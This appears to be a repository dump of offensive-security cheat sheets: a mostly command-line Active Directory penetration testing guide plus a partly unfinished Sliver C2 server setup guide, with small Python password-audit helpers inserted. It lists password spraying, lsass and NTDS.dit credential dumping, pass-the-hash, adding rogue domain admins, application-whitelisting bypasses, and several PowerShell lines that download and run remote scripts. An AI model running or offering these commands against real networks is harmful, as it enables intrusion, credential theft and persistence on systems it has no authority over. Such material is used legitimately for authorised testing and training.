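    for word in ("password", "welcome"):
        if re.fullmatch(leet_regex(word) + SUFFIX, pw):
            return f"{word}+suffix"
    for season in SEASONS:
        if re.fullmatch(leet_regex(season) + YEAR, pw):
            return "season+year"
    for month in MONTHS:
        if re.fullmatch(leet_regex(month) + YEAR, pw):
            return "month+year"
    for company in company_names:
        if re.fullmatch(leet_regex(company) + SUFFIX, pw):
            return "company+suffix"
    return None


def check_password_list(passwords, company_names=()):
    """Map each candidate password to the pattern it matches (None means it passes)."""
    return {pw: weak_pattern(pw, company_names) for pw in passwords}


if __name__ == "__main__":
    # Constructed candidates: the cheat-sheet patterns plus one that should pass.
    samples = ["Password1", "Welcome@123", "P@55w0rd", "Spring2017", "October24",
               "Contoso1!", "correct-horse-battery-staple"]
    for pw, hit in check_password_list(samples, company_names=("Contoso",)).items():
        print(f"{pw:32} {hit or 'ok'}")
```
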
1080 | ### Using hydra
1081 |
1082 | `hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V`
1083 |
1084 | ### Bruteforce using net use
1085 |
1086 | `@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL`
1087 |
1088 |
1089 | ### all systems
1090 |
1091 | `net view /domain > systems.txt`
1092 |
1093 | ### Local admin search using net use
1094 |
1095 | `@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL`
1098 |
1099 | ### Domain joined machine
1100 |
1101 | `Invoke-DomainPasswordSpray -Password Spring2017`
1102 |
1103 | ## Non-domain joined testing
1104 |
1105 | Once you have an initial set of compromised credentials, run these from a virtual machine to gain a foothold on the network as a domain user.
1106 |
1107 | ### Shell with domain user privileges
1108 | `C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe`
1109 |
1110 | `runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc"`
1111 |
1112 | Make sure you use the FQDN of the domain and set the reg key as below.
1113 |
1114 | ### check dc:
1115 | `nltest /dsgetdc:domain.local`
1116 |
1117 | To change DC via registry to point at domain being tested:
1118 |
1119 | `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters`
1120 |
1121 | `"SiteName"` = `DC1.domain.com`
1126 |
1127 | ### Create session for use with dumpsec
1128 | `net use \\10.0.0.1\ipc$ /user:domain.local\username password`
1129 |
1130 | ### Quick User lists and password policy enum
1131 |
1132 | `net users /domain`
1133 |
1134 | `net group /domain "Domain Admins"`
1135 |
1136 | `net accounts /domain`
1137 |
1138 | Note that the above commands do not work with runas. The PowerView functions below do work with runas.
1139 |
1140 | ### Powerview:
1141 |
1142 | `. .\PowerView.ps1`
1143 |
1144 | `Get-UserProperty -Properties samaccountname`
1145 |
1146 | `Get-NetGroupMember`
1147 |
1148 | `Get-DomainPolicy`
1149 |
1150 | Search shares and files using Invoke-FileFinder and Invoke-ShareFinder
1151 |
1152 | ## Domain Analysis
1153 |
1154 | ### BloodHound
1155 |
1156 | Run locally on non-domain joined machine (remember to add target domain to registry):
1157 |
1158 | `..\BloodHound.ps1`
1159 |
1160 | `Invoke-BloodHound`
1161 |
1162 | ### SharpHound
1163 |
1164 | `SharpHound.exe --CollectionMethod All`
1165 |
1166 | ### Run from remote shell
1167 |
1168 | Useful when you have a remote shell.
1169 |
1170 | `powershell Set-ExecutionPolicy RemoteSigned`
1171 |
1172 | `powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"`
1173 |
1174 | ### Run from web server or over Internet:
1175 |
1176 | Use this when you cannot copy BloodHound.ps1 over to target.
1177 |
1178 | `powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"`
1179 |
1180 | ### Run using Sharppick - AMSI bypass
1181 |
1182 | `SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"`
1183 |
1184 | `SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"`
1185 |
1186 | ### Goddi (fast dump all domain info)
1187 |
1188 | `.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe`
1189 |
1190 | ### ADRecon (More detailed - Good for AD Auditing)
1191 |
1192 | https://github.com/sense-of-security/ADRecon
1193 |
1194 | ### Share and file finder
1195 | `Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt`
1196 |
1197 | `Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv`
1200 |
1201 | ### Eyewitness
1202 | `docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com`
1203 |
1204 | ### Windows priv esc
1205 |
1206 | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
1207 |
1208 | ## Compromise and Lateral Movement
1209 |
1210 | ### Crackmapexec
1211 |
1212 | `crackmapexec smb 172.16.110.0/24`
1213 |
1214 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'`
1215 |
1216 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol`
1217 |
1218 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz`
1219 |
1220 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam`
1221 |
1222 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa`
1223 |
1224 | ### Winexe to boxes (not opsec safe) - service is run. No cleanup.
1225 |
1226 | `pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%blahpassword cmd`
1227 |
1228 | `pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%hash cmd`
1229 |
1230 | ### Impacket psexec.py to boxes (not opsec safe) - cleans up afterwards but leaves logs from installing and running the service.
1231 |
1232 | `psexec.py user@IP`
1233 |
1234 | `psexec.py user@IP -hashes ntlm:hash`
1235 |
1236 | ### Impacket wmiexec.py (opsec safe - unless WMI logging is enabled)
1237 |
1238 | `wmiexec.py domain/user@IP`
1239 |
1240 | `wmiexec.py domain/user@IP -hashes ntlm:hash`
1241 |
1242 | ### Impacket smbclient (probably opsec safe as it's just using SMB)
1243 |
1244 | `python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah`
1245 |
1246 | ## RDP Pass the Hash
1247 | Using mimikatz:
1248 |
1249 | `privilege::debug`
1250 | `sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"`
1251 |
1252 | If Restricted Admin mode is disabled on the target, enable it by setting the registry value:
1253 |
1254 | `sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe`
1255 | `Enter-PSSession -Computer `
1256 | `New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force`
1257 |
1258 | ## Invoke the hash
1259 |
1260 | `Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah`
1261 |
1262 | ## Password dumping
1263 |
1264 | ### From Live Kali on a workstation
1265 | `samdump2 SYSTEM SAM > hashes.txt`
1266 |
1267 | ### Local
1268 |
1269 | `C:\> reg.exe save hklm\sam c:\temp\sam.save`
1270 |
1271 | `C:\> reg.exe save hklm\security c:\temp\security.save`
1272 |
1273 | `C:\> reg.exe save hklm\system c:\temp\system.save`
1274 |
1275 | `secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`
1276 |
1277 | `pwdump system sam`
1278 |
1279 | ### In Memory
1280 | `C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1`
1281 |
1282 | `C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit`
1283 |
1284 | `C:\>mini.exe`
1285 |
1286 | https://github.com/b4rtik/ATPMiniDump
1287 |
1288 | ### From box
1289 |
1290 | `mimikatz # privilege::debug`
1291 | `mimikatz # sekurlsa::logonPasswords full`
1292 |
1293 | ### Remote
1294 |
1295 | `impacket-secretsdump Administrator@ip`
1296 | `impacket-secretsdump Administrator@ip -hashes ntlm:hash`
1297 |
1298 | ### Domain
1299 |
1300 | To find where NTDS.dit is stored, run:
1301 |
1302 | `reg.exe query hklm\system\currentcontrolset\services\ntds\parameters`
1303 |
1304 | ### vssadmin
1305 |
1306 | `C:\> vssadmin list shadows`
1307 |
1308 | `C:\> vssadmin create shadow /for=C:`
1309 |
1310 | `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .`
1311 |
1312 | `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .`
1313 |
1314 | `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .`
1315 |
1316 | `secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm`
1317 |
1318 | Remove machine accounts (names ending in `$`):
1319 |
1320 | `grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt`
1321 |
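The machine-account filter above, as an added example that is not part of the original cheat sheet, done in Python rather than grep and extended into the check a password audit of an NTDS dump usually needs: which accounts share the same NT hash (password reuse) and which have an empty password. The dump lines and hash values are constructed placeholders; only the empty-LM and empty-NT constants are the real well-known values.

```python
import re
from collections import defaultdict

# Constructed secretsdump-style output; the NT hashes are made-up placeholders.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ZDEFENSE\alice:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
ZDEFENSE\bob:1106:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
ZDEFENSE\WS01$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
ZDEFENSE\svc_sql:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
"""

# One credential line: [DOMAIN\]user:RID:LMhash:NThash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_dump(text, keep_machine=False):
    """Parse credential lines; machine accounts (trailing '$') are dropped
    unless keep_machine is set, mirroring the grep -v '$:' filter."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner lines, Kerberos keys, etc.
        if not keep_machine and m["user"].endswith("$"):
            continue
        records.append({"user": m["user"], "rid": int(m["rid"]), "nt": m["nt"].lower()})
    return records


def shared_hashes(records):
    """Map each NT hash used by more than one account to those accounts."""
    by_hash = defaultdict(list)
    for r in records:
        by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(records):
    """Accounts whose NT hash is the well-known hash of the empty password."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]
```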
1322 | Extract only the passwords for pipal:
1323 |
1324 | `cut -f 3 -d ':' cracked_with_users_enabled.txt`
1325 |
1326 | `vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}`
1327 |
1328 | Use godumpsecrets for faster dumping.
1329 |
1330 | ### ntdsutil
1331 |
1332 | ```
1333 | C:\>ntdsutil
1334 | ntdsutil: activate instance ntds
1335 | ntdsutil: ifm
1336 | ifm: create full c:\pentest
1337 | ifm: quit
1338 | ntdsutil: quit
1339 | ```
1340 |
1341 | `ntdsutil`
1342 |
1343 | `ntdsutil: snapshot`
1344 |
1345 | `ntdsutil: list all`
1346 |
1347 | `ntdsutil: create`
1348 |
1349 | `snapshot: mount 1`
1350 |
1351 | Cleanup snapshots:
1352 |
1353 | `snapshot: list all`
1354 |
1355 | `snapshot: unmount 1`
1356 |
1357 | `snapshot: list all`
1358 |
1359 | `snapshot: delete 1`
1360 |
1361 | ## Post Compromise (Not opsec safe)
1362 | Add user to local admin and domain admin
1363 |
1364 | ### Add Domain Admin
1365 | `net user username password /ADD /DOMAIN`
1366 |
1367 | `net group "Domain Admins" username /ADD /DOMAIN`
1368 |
1369 | ### Add Local Admin
1370 | `net user username password /ADD`
1371 |
1372 | `net localgroup Administrators username /ADD`
1373 |
1374 |
1375 | ### Tasklist scraper to find logged in admins
1376 |
1377 | If PowerShell is not enabled or BloodHound cannot be run, this script finds logged-in admins by pulling `tasklist /v` from each host:
1378 |
1379 | ```
1380 | #!/bin/sh
1381 | # One target IP per line in ip.txt
1382 | while read -r ip; do
1383 |     pth-winexe -U Admin%hash "//$ip" "ipconfig"
1384 |     pth-winexe -U Admin%hash "//$ip" "tasklist /v"
1385 | done < ip.txt
1386 | ```
1387 |
1388 |
1389 | ### Kerberoasting
1390 |
1391 | `Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
1392 |
1393 | https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
1394 |
1395 | `Invoke-AutoKerberoast`
1396 |
1397 | `python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast`
1398 |
1399 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast`
1400 |
1401 | ### Hashcat Alienware - kerbtgt hash cracking
1402 |
1403 | `sudo apt-get install nvidia-367`
1404 |
1405 | `sudo nvidia-smi`
1406 |
1407 | `reboot`
1408 |
1409 | `sudo hashcat -I`
1410 |
1411 | `hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst`
1412 |
1413 | ### LAPS - GetLAPSPasswords
1414 |
1415 | https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
1416 |
1417 | ## Priv Esc
1418 | ### Powerup
1419 |
1420 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks`
1421 |
1422 | ## File Transfer
1423 |
1424 | ### SMB Server in Kali
1425 |
1426 | `python smbserver.py test /root/tools`
1427 |
1428 | ### Python Web Server
1429 |
1430 | `python -m SimpleHTTPServer`
1431 |
1432 | ## Domain Fronting
1433 |
1434 | https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
1435 | https://signal.org/blog/doodles-stickers-censorship/
1436 | https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/
1437 | https://trac.torproject.org/projects/tor/wiki/doc/meek
1438 | http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/
1439 |
1440 | ## AWL bypasses
1441 |
1442 | ### Powershell without powershell.exe
1443 |
1444 | `SharpPick.exe -d "http://zdefense/blah.ps1"`
1445 |
1446 | ### Squiblytwo
1447 |
1448 | `wmic.exe os get /format:"http://zdefense/foo.xsl"`
1449 |
1450 | ### Sharpshooter
1451 |
1452 | https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/
1453 |
1454 | `python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://ZDefense/foo.xsl`
1455 |
1456 | ### Cypher queries (BloodHound)
1457 |
1458 | Map each user to the computers on which they have local admin:
1459 |
1460 | `MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)`
1461 |
1462 | List of Domain Admins:
1463 | `Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@ZDefense" return u.displayname`
1464 |
1465 | ### dnscat2
1466 |
1467 | https://downloads.skullsecurity.org/dnscat2/
1468 | https://github.com/lukebaggett/dnscat2-powershell
1469 |
1470 | `dnscat --host`
1468 |
--------------------------------------------------------------------------------
/SliverC2/README.md:
--------------------------------------------------------------------------------
1 | # Sliver C2 Cheat Sheet
2 |
3 | # TO DO - Work in Progress
4 |
5 | ## Setup
6 |
7 | The Sliver client and server can both be downloaded from the public [GitHub releases](https://github.com/BishopFox/sliver/releases/), or compiled manually.
8 |
9 | ### Sliver Server
10 |
11 | The Sliver server can be installed to run in "Daemon mode" using the [Linux Install Script](https://github.com/BishopFox/sliver/wiki/Linux-Install-Script). The quick Bash script below installs the requirements, installs and starts the Sliver server, and creates an operator config:
12 | ```
13 | #!/bin/bash
14 |
15 | if [[ $(/usr/bin/id -u) -ne 0 ]]; then
16 |     echo "Not running as root"
17 |     exit 1
18 | fi
19 |
20 | # Stop apache if it was started automatically
21 | service apache2 stop
22 |
23 | cd /tmp
24 | apt update -y
25 | apt update --fix-missing -y
26 | apt install git mingw-w64 net-tools -y
27 |
28 | # Sliver install in Daemon mode (already root, so no sudo needed)
29 | curl -s https://sliver.sh/install | bash
30 | systemctl status sliver --no-pager
31 | echo "Sliver running in Daemon mode!"
32 |
33 | # Create new operator config, using this host's public IP as the server address
34 | cd /root
35 | IP=$(curl -s https://ifconfig.me/ip)
36 | ./sliver-server operator --name sliver-user --lhost "$IP" --save /root/sliver-user.cfg
37 | exit 0
38 | ```
39 |
40 | Verify that the Sliver service is running with `systemctl status sliver`.
41 | Download the config file `/root/sliver-user.cfg` produced by the Bash script above and import it in your Sliver client.
42 |
43 | If you want to automate Sliver C2 setup and deployment in DigitalOcean, check out my [GitHub repo](https://github.com/wsummerhill/Automation-Scripts/tree/main/Sliver-C2-deployment_DigitalOcean).
44 |
45 | ### Sliver Client
46 |
47 | Use the Sliver client to import your `sliver-user.cfg` config file and use it to connect to the Sliver server:
48 | ```
49 | ./sliver-client_OS import ./sliver-user.cfg # Import config
50 | ./sliver-client_OS # Connect to Sliver server
51 |
52 | Connecting to :31337 ...
53 | [*] Loaded 69 extension(s) from disk
54 |
55 | ███████╗██╗ ██╗██╗ ██╗███████╗██████╗
56 | ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
57 | ███████╗██║ ██║██║ ██║█████╗ ██████╔╝
58 | ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
59 | ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
60 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
61 |
62 | All hackers gain undying
63 | [*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b
64 | [*] Welcome to the sliver shell, please type 'help' for options
65 |
66 | sliver > help
67 | ...
68 | ```
69 |
70 | ---
71 | ## Usage - Useful CLI Commands Cheat Sheet
72 | ```
73 | # Starting HTTP/S Listeners
74 | http -> Start HTTP listener
75 | https -> Start HTTPS listener
76 | https -c cert.pem -k key_decrypted.pem -d domain.com -p -> Start HTTPS listener using a cert/key which only accepts connections from a specific domain (i.e. redirector)
77 |
78 | # Managing or stopping listeners
79 | jobs -> View active jobs (aka listeners/stages)
80 | jobs -k -> Kill listener job
81 |
82 | # Beacon/Session management
83 | beacons -> List active beacons
84 | sessions -> List active sessions
85 | beacons rm -> Select a beacon to remove
86 | use -> Interact with a Beacon/Session
87 | background -> Background an active Beacon/Session
88 |
89 | # Payloads
90 | implants -> List all created payload builds
91 | implants rm -> Remove an implant build
92 | generate ... -> Create Session payload
93 | generate beacon ... -> Create Beacon payload
94 |
95 | # Armory (BOFs)
96 | armory -> List all available packages/bundles in armory
97 | armory search -> Search for a specific armory package/bundle
98 | armory install -> Install a new armory package/bundle
99 | armory update -> Update installed packages
100 |
101 | # Miscellaneous
102 | hosts -> List all hosts that have had beacons or sessions
103 | update -> Check for Sliver updates
104 | clear -> Clear the screen
105 | loot -> Show captured loot
106 | reaction ... -> Create automatic command upon specific events like a new session
107 | ```
108 |
109 | ---
110 | ## Listeners - HTTP(S)
111 |
112 | TO DO
113 |
114 | ---
115 | ## Redirectors - HTTP(S)
116 |
117 | TO DO
118 |
119 | ---
120 | ## Payloads
121 | ### Beacon Payloads
122 |
123 | TO DO
124 |
125 | ### Session Payloads
126 |
127 | TO DO
128 |
129 | ### Debugging Payloads for testing
130 |
131 | Sliver can easily create debugging payloads for testing execution or viewing the C2 traffic sent by the payload or server. Use the `generate --debug`
132 | parameter when generating new payloads; the debug output is then shown in the console.
133 |
134 | ---
135 | ## OPSEC Tips
136 |
137 | - Best practice is to modify the default HTTP(S) C2 profile at the local path `/root/.sliver/configs/http-c2.json`
138 | - Wherever possible, use Sliver Armory packages to execute commands within the current process instead of commands or tools that spawn new or child processes
139 |
--------------------------------------------------------------------------------